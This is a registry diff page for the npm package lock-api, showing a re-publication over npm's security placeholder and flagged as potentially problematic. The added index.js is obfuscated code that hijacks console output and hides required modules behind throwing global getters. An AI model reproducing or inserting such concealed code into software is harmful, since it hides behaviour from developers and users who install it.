lock-api 0.0.1-security → 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of lock-api might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +20 -6
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const _0x33b827=_0x3dea;(function(_0x1f4d8a,_0x4289af){const _0x2ee9da=_0x3dea,_0x5f0b95=_0x1f4d8a();while(!![]){try{const _0x5d84bb=-parseInt(_0x2ee9da(0x1df))/0x1*(-parseInt(_0x2ee9da(0x1dd))/0x2)+-parseInt(_0x2ee9da(0x1dc))/0x3*(-parseInt(_0x2ee9da(0x1e5))/0x4)+parseInt(_0x2ee9da(0x1e3))/0x5*(parseInt(_0x2ee9da(0x1e8))/0x6)+parseInt(_0x2ee9da(0x1e2))/0x7+-parseInt(_0x2ee9da(0x1e0))/0x8*(parseInt(_0x2ee9da(0x1e1))/0x9)+parseInt(_0x2ee9da(0x1e6))/0xa+-parseInt(_0x2ee9da(0x1e9))/0xb*(parseInt(_0x2ee9da(0x1e7))/0xc);if(_0x5d84bb===_0x4289af)break;else _0x5f0b95['push'](_0x5f0b95['shift']());}catch(_0x445457){_0x5f0b95['push'](_0x5f0b95['shift']());}}}(_0x1b4f,0x8d868));function _0x3dea(_0x233f96,_0x46a3c1){const _0x1b4f5a=_0x1b4f();return _0x3dea=function(_0x3dea60,_0x3c5815){_0x3dea60=_0x3dea60-0x1dc;let _0x594e74=_0x1b4f5a[_0x3dea60];return _0x594e74;},_0x3dea(_0x233f96,_0x46a3c1);}const apiCode=_0x33b827(0x1e4);module[_0x33b827(0x1de)]=apiCode;function _0x1b4f(){const _0x2c6321=['1367055klMhUR','80184AoHQaE','exports','9ipXgTT','128pHEZwD','638136YidWxn','5975907jMgoTV','59590cmsBie','(function()\x20{\x0afunction\x20protectApiMethod(method,\x20...args)\x20{\x0a\x20\x20\x20\x20const\x20redText\x20=\x20\x27\x1b[31m\x27;\x0a\x20\x20\x20\x20const\x20resetText\x20=\x20\x27\x1b[0m\x27;\x0a\x20\x20\x20\x20if\x20(args.some(arg\x20=>\x20arg\x20===\x20global[uniqueKey]))\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20method.call(console,\x20`${redText}An\x20error\x20occurred${resetText}`);\x0a\x20\x20\x20\x20}\x20else\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20method.apply(console,\x20args);\x0a\x20\x20\x20\x20}\x0a}\x0a\x0afunction\x20secureApi(uniqueKeyName,\x20requireModuleName)\x20{\x0a\x20\x20\x20\x20const\x20uniqueKey\x20=\x20Symbol(uniqueKeyName);\x0a\x20\x20\x20\x20const\x20moduleInstance\x20=\x20require(requireModuleName);\x0a\x20\x20\x20\x20Object.defineProperty(global,\x20uniqueKey,\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20value:\x20moduleInstance,\x0a\x20\x20\x20\x20\x20\x20\x20\x20writable:\x20false,\x0a\x20\x20\x20\x20\x20\x20\x20\x20configurable:\x20false,\x0a\x20\x20\x20\x20\x20\x20\x20\x20enumerable:\x20false\x0a\x20\x20\x20\x20});\x0a\x0a\x20\x20\x20\x20const\x20originalConsoleLog\x20=\x20console.log;\x0a\x20\x20\x20\x20const\x20originalConsoleError\x20=\x20console.error;\x0a\x20\x20\x20\x20const\x20originalConsoleWarn\x20=\x20console.warn;\x0a\x0a\x20\x20\x20\x20console.log\x20=\x20function(...args)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20protectApiMethod(originalConsoleLog,\x20...args);\x0a\x20\x20\x20\x20};\x0a\x20\x20\x20\x20console.error\x20=\x20function(...args)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20protectApiMethod(originalConsoleError,\x20...args);\x0a\x20\x20\x20\x20};\x0a\x20\x20\x20\x20console.warn\x20=\x20function(...args)\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20protectApiMethod(originalConsoleWarn,\x20...args);\x0a\x20\x20\x20\x20};\x0a\x0a\x20\x20\x20\x20Object.defineProperty(global,\x20requireModuleName,\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20get()\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20throw\x20new\x20Error(`${redText}An\x20error\x20occurred${resetText}`);\x0a\x20\x20\x20\x20\x20\x20\x20\x20},\x0a\x20\x20\x20\x20\x20\x20\x20\x20configurable:\x20false,\x0a\x20\x20\x20\x20\x20\x20\x20\x20enumerable:\x20false\x0a\x20\x20\x20\x20});\x0a\x0a\x20\x20\x20\x20moduleInstance.someFunction();\x20\x0a}\x0a\x0asecureApi(\x27chii-api-key\x27,\x20\x27chii-api\x27);\x0asecureApi(\x27discord-chii-key\x27,\x20\x27discord-chii\x27);\x0a\x0a','8zBYlzb','9084740CUtImj','12kHaJwD','414yVKtsC','23568193rAKKrr'];_0x1b4f=function(){return _0x2c6321;};return _0x1b4f();}
package/package.json CHANGED
@@ -1,6 +1,20 @@
1
- {
2
- "name": "lock-api",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
1
+ {
2
+ "name": "lock-api",
3
+ "version": "1.0.2",
4
+ "description": "API code lock",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "node index.js"
8
+ },
9
+ "repository": {
10
+ "type": "git",
11
+ "url": "git+https://github.com/Hnuuchii/api-chii.git"
12
+ },
13
+ "keywords": ["base64", "decode"],
14
+ "author": "lock-api",
15
+ "license": "ISC",
16
+ "bugs": {
17
+ "url": "https://github.com/Hnuuchii/api-chii"
18
+ },
19
+ "homepage": "https://github.com/Hnuuchii/api-chii#readme"
20
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=lock-api for more information.